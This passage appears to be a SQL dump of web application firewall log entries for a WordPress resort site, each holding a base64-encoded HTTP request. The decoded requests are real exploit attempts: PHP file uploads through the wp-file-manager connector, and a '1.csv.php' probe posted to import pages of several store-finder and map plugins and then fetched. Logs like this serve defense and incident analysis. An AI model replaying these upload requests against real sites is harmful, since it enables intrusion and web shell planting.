Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"Nng4M2o4NTNvbTkybnNjLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZSwgVGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocApUZTogdHJhaWxlcnMKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2Ojc3LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzcuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PXhZelpZCkNvbnRlbnQtTGVuZ3RoOiA0Mzc3CgotLXhZelpZCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iY21kIgoKdXBsb2FkCi0teFl6WlkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLXhZelpZLS0K\"}'),(175044,1603162305.908184,1603162305.321200,'\0\0\0\0\0\0\0\0\0\0Ih',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"Nng4M2o4NTNvbTkybnNjLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZSwgVGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocApUZTogdHJhaWxlcnMKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2Ojc3LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzcuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PXhZelpZCkNvbnRlbnQtTGVuZ3RoOiA0Mzc3CgotLXhZelpZCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iY21kIgoKdXBsb2FkCi0teFl6WlkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLXhZelpZLS0K\"}'),(175045,1603162297.823118,1603162297.256500,'\0\0\0\0\0\0\0\0\0\0n#',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"Nng4M2o4NTNvbTkybnNjLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZSwgVGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocApUZTogdHJhaWxlcnMKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2Ojc3LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzcuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PXhZelpZCkNvbnRlbnQtTGVuZ3RoOiA0Mzc3CgotLXhZelpZCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iY21kIgoKdXBsb2FkCi0teFl6WlkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLXhZelpZLS0K\"}'),(175046,1603162290.578804,1603162289.996300,'\0\0\0\0\0\0\0\0\0\0q3',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"Nng4M2o4NTNvbTkybnNjLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZSwgVGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocApUZTogdHJhaWxlcnMKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2Ojc3LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzcuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PXhZelpZCkNvbnRlbnQtTGVuZ3RoOiA0Mzc3CgotLXhZelpZCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iY21kIgoKdXBsb2FkCi0teFl6WlkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLXhZelpZLS0K\"}'),(175047,1603162287.662018,1603162286.918700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"Nng4M2o4NTNvbTkybnNjLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpDb25uZWN0aW9uOiBjbG9zZSwgVGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocApUZTogdHJhaWxlcnMKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgSW50ZWwgTWFjIE9TIFggMTAuMTU7IHJ2Ojc3LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzcuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PXhZelpZCkNvbnRlbnQtTGVuZ3RoOiA0Mzc3CgotLXhZelpZCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iY21kIgoKdXBsb2FkCi0teFl6WlkKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLXhZelpZLS0K\"}'),(175048,1603550864.614621,1603550862.204200,'\0\0\0\0\0\0\0\0\0\0	G',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'Mozilla/5.0 Gecko/20100101 Firefox/69.0','blocked:waf','Malicious File Upload','{\"learningMode\":0,\"failedRules\":\"11\",\"paramKey\":\"cmVxdWVzdC5maWxlTmFtZXNbdXBsb2FkXVswXQ==\",\"paramValue\":\"Y3NzLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlLW1hbmFnZXIvbGliL3BocC9jb25uZWN0b3IubWluaW1hbC5waHA=\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3dwLWZpbGUtbWFuYWdlci9saWIvcGhwL2Nvbm5lY3Rvci5taW5pbWFsLnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUKSG9zdDogYXNoYnlyZXNvcnQuY29tClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjkuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLWZlMGQ2OTljMzU4NDczMTYKQ29udGVudC1MZW5ndGg6IDExNzAKCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tZmUwZDY5OWMzNTg0NzMxNgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImNtZCIKCnVwbG9hZAotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLWZlMGQ2OTljMzU4NDczMTYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0YXJnZXQiCgpsMV9MdwotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLWZlMGQ2OTljMzU4NDczMTYtLQo=\"}'),(175049,1603641241.975116,1603641241.173500,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'http://ashbyresort.com/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/1.csv.php','http://www.facebook.net/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9TU0ZfV1BfVVBMT0FEU19QQVRIL2Nzdi9pbXBvcnQvMS5jc3YucGhw\",\"category\":\"logged\",\"ssl\":0,\"fullRequest\":\"R0VUIC93cC1jb250ZW50L3BsdWdpbnMvc3VwZXJzdG9yZWZpbmRlci13cC9zc2Ytd3AtYWRtaW4vcGFnZXMvU1NGX1dQX1VQTE9BRFNfUEFUSC9jc3YvaW1wb3J0LzEuY3N2LnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpIb3N0OiBhc2hieXJlc29ydC5jb20KUmVmZXJlcjogaHR0cDovL3d3dy5mYWNlYm9vay5uZXQvClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdPVzY0OyBydjo1Ni4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzcyLjAKCg==\"}'),(175050,1603641240.681537,1603641239.476100,'\0\0\0\0\0\0\0\0\0\03S',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php','http://ashbyresort.com/wp-content/plugins/super-interactive-maps/sim-wp-admin/pages/import.php','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlci1pbnRlcmFjdGl2ZS1tYXBzL3NpbS13cC1hZG1pbi9wYWdlcy9pbXBvcnQucGhw\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3N1cGVyLWludGVyYWN0aXZlLW1hcHMvc2ltLXdwLWFkbWluL3BhZ2VzL2ltcG9ydC5waHAgSFRUUC8xLjEKQWNjZXB0OiAqLyoKRXhwZWN0OiAxMDAtY29udGludWUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3N1cGVyLWludGVyYWN0aXZlLW1hcHMvc2ltLXdwLWFkbWluL3BhZ2VzL2ltcG9ydC5waHAKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjU2LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzIuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1jMGUzYzg1NWY4YTgKQ29udGVudC1MZW5ndGg6IDI1MgoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tYzBlM2M4NTVmOGE4CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZGVmYXVsdF9sb2NhdGlvbiI7IGZpbGVuYW1lPSIxLmNzdi5waHAiCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtCkV4cGlyZXM6IDAKCjw\\/cGhwCiR6ID0gJ3F3ZXJ0eXUnLidpb3AnOwplY2hvICR6OwoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tYzBlM2M4NTVmOGE4LS0K\"}'),(175051,1603641238.628428,1603641237.518400,'\0\0\0\0\0\0\0\0\0\03S',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php','http://ashbyresort.com/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/pages/import.php','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcmxvZ29zaG93Y2FzZS13cC9zbHMtd3AtYWRtaW4vcGFnZXMvaW1wb3J0LnBocA==\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3N1cGVybG9nb3Nob3djYXNlLXdwL3Nscy13cC1hZG1pbi9wYWdlcy9pbXBvcnQucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkV4cGVjdDogMTAwLWNvbnRpbnVlCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpSZWZlcmVyOiBodHRwOi8vYXNoYnlyZXNvcnQuY29tL3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcmxvZ29zaG93Y2FzZS13cC9zbHMtd3AtYWRtaW4vcGFnZXMvaW1wb3J0LnBocApVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXT1c2NDsgcnY6NTYuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC83Mi4wCkNvbnRlbnQtVHlwZTogbXVsdGlwYXJ0L2Zvcm0tZGF0YTsgYm91bmRhcnk9LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE4Y2E2YzkzZmNhMgpDb250ZW50LUxlbmd0aDogMjUyCgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xOGNhNmM5M2ZjYTIKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJkZWZhdWx0X2xvY2F0aW9uIjsgZmlsZW5hbWU9IjEuY3N2LnBocCIKQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0KRXhwaXJlczogMAoKPD9waHAKJHogPSAncXdlcnR5dScuJ2lvcCc7CmVjaG8gJHo7CgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xOGNhNmM5M2ZjYTItLQo=\"}'),(175052,1603641236.642252,1603641233.914800,'\0\0\0\0\0\0\0\0\0\03S',0,403,0,0,0,'http://ashbyresort.com/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php','http://ashbyresort.com/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9pbXBvcnQucGhw\",\"category\":\"file_upload\",\"ssl\":0,\"fullRequest\":\"UE9TVCAvd3AtY29udGVudC9wbHVnaW5zL3N1cGVyc3RvcmVmaW5kZXItd3Avc3NmLXdwLWFkbWluL3BhZ2VzL2ltcG9ydC5waHAgSFRUUC8xLjEKQWNjZXB0OiAqLyoKRXhwZWN0OiAxMDAtY29udGludWUKSG9zdDogYXNoYnlyZXNvcnQuY29tClJlZmVyZXI6IGh0dHA6Ly9hc2hieXJlc29ydC5jb20vd3AtY29udGVudC9wbHVnaW5zL3N1cGVyc3RvcmVmaW5kZXItd3Avc3NmLXdwLWFkbWluL3BhZ2VzL2ltcG9ydC5waHAKVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjU2LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzIuMApDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS01ZWI0MTgzMGIxNTYKQ29udGVudC1MZW5ndGg6IDI1MgoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tNWViNDE4MzBiMTU2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0iZGVmYXVsdF9sb2NhdGlvbiI7IGZpbGVuYW1lPSIxLmNzdi5waHAiCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtCkV4cGlyZXM6IDAKCjw\\/cGhwCiR6ID0gJ3F3ZXJ0eXUnLidpb3AnOwplY2hvICR6OwoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tNWViNDE4MzBiMTU2LS0K\"}'),(175053,1603641250.211407,1603641249.638200,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'https://ashbyresort.com/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/1.csv.php','http://www.facebook.net/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi8xLmNzdi5waHA=\",\"category\":\"logged\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1jb250ZW50L3BsdWdpbnMvc3VwZXJzdG9yZWZpbmRlci13cC9zc2Ytd3AtYWRtaW4vMS5jc3YucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpSZWZlcmVyOiBodHRwOi8vd3d3LmZhY2Vib29rLm5ldC8KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjU2LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzIuMApYLUh0dHBzOiAxCgo=\"}'),(175054,1603641248.362424,1603641247.653300,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'http://ashbyresort.com/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/1.csv.php','http://www.facebook.net/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi8xLmNzdi5waHA=\",\"category\":\"logged\",\"ssl\":0,\"fullRequest\":\"R0VUIC93cC1jb250ZW50L3BsdWdpbnMvc3VwZXJzdG9yZWZpbmRlci13cC9zc2Ytd3AtYWRtaW4vMS5jc3YucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpSZWZlcmVyOiBodHRwOi8vd3d3LmZhY2Vib29rLm5ldC8KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjU2LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzIuMAoK\"}'),(175055,1603641246.192969,1603641245.438800,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'https://ashbyresort.com/wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/1.csv.php','http://www.facebook.net/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcnN0b3JlZmluZGVyLXdwL3NzZi13cC1hZG1pbi9wYWdlcy9TU0ZfV1BfVVBMT0FEU19QQVRIL2Nzdi9pbXBvcnQvMS5jc3YucGhw\",\"category\":\"logged\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1jb250ZW50L3BsdWdpbnMvc3VwZXJzdG9yZWZpbmRlci13cC9zc2Ytd3AtYWRtaW4vcGFnZXMvU1NGX1dQX1VQTE9BRFNfUEFUSC9jc3YvaW1wb3J0LzEuY3N2LnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpIb3N0OiBhc2hieXJlc29ydC5jb20KUmVmZXJlcjogaHR0cDovL3d3dy5mYWNlYm9vay5uZXQvClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdPVzY0OyBydjo1Ni4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzcyLjAKWC1IdHRwczogMQoK\"}'),(175056,1603641257.175956,1603641256.472800,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'http://ashbyresort.com/wp-content/plugins/super-interactive-maps/sim-wp-admin/1.csv.php','http://www.facebook.net/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlci1pbnRlcmFjdGl2ZS1tYXBzL3NpbS13cC1hZG1pbi8xLmNzdi5waHA=\",\"category\":\"logged\",\"ssl\":0,\"fullRequest\":\"R0VUIC93cC1jb250ZW50L3BsdWdpbnMvc3VwZXItaW50ZXJhY3RpdmUtbWFwcy9zaW0td3AtYWRtaW4vMS5jc3YucGhwIEhUVFAvMS4xCkFjY2VwdDogKi8qCkhvc3Q6IGFzaGJ5cmVzb3J0LmNvbQpSZWZlcmVyOiBodHRwOi8vd3d3LmZhY2Vib29rLm5ldC8KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV09XNjQ7IHJ2OjU2LjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNzIuMAoK\"}'),(175057,1603641255.232665,1603641254.546700,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'https://ashbyresort.com/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/1.csv.php','http://www.facebook.net/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 51.83.216.204','{\"learningMode\":0,\"failedRules\":\"logged\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zdXBlcmxvZ29zaG93Y2FzZS13cC9zbHMtd3AtYWRtaW4vMS5jc3YucGhw\",\"category\":\"logged\",\"ssl\":1,\"fullRequest\":\"R0VUIC93cC1jb250ZW50L3BsdWdpbnMvc3VwZXJsb2dvc2hvd2Nhc2Utd3Avc2xzLXdwLWFkbWluLzEuY3N2LnBocCBIVFRQLzEuMQpBY2NlcHQ6ICovKgpIb3N0OiBhc2hieXJlc29ydC5jb20KUmVmZXJlcjogaHR0cDovL3d3dy5mYWNlYm9vay5uZXQvClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdPVzY0OyBydjo1Ni4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzcyLjAKWC1IdHRwczogMQoK\"}'),(175058,1603641253.285708,1603641252.441700,'\0\0\0\0\0\0\0\0\0\03S',0,200,0,0,0,'http://ashbyresort.com/wp-content/plugins/superlogoshowcase-wp/sls-wp-admin/1.csv.php','http://www.facebook.net/','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/72.0','logged:waf','Watched IP Traffic: 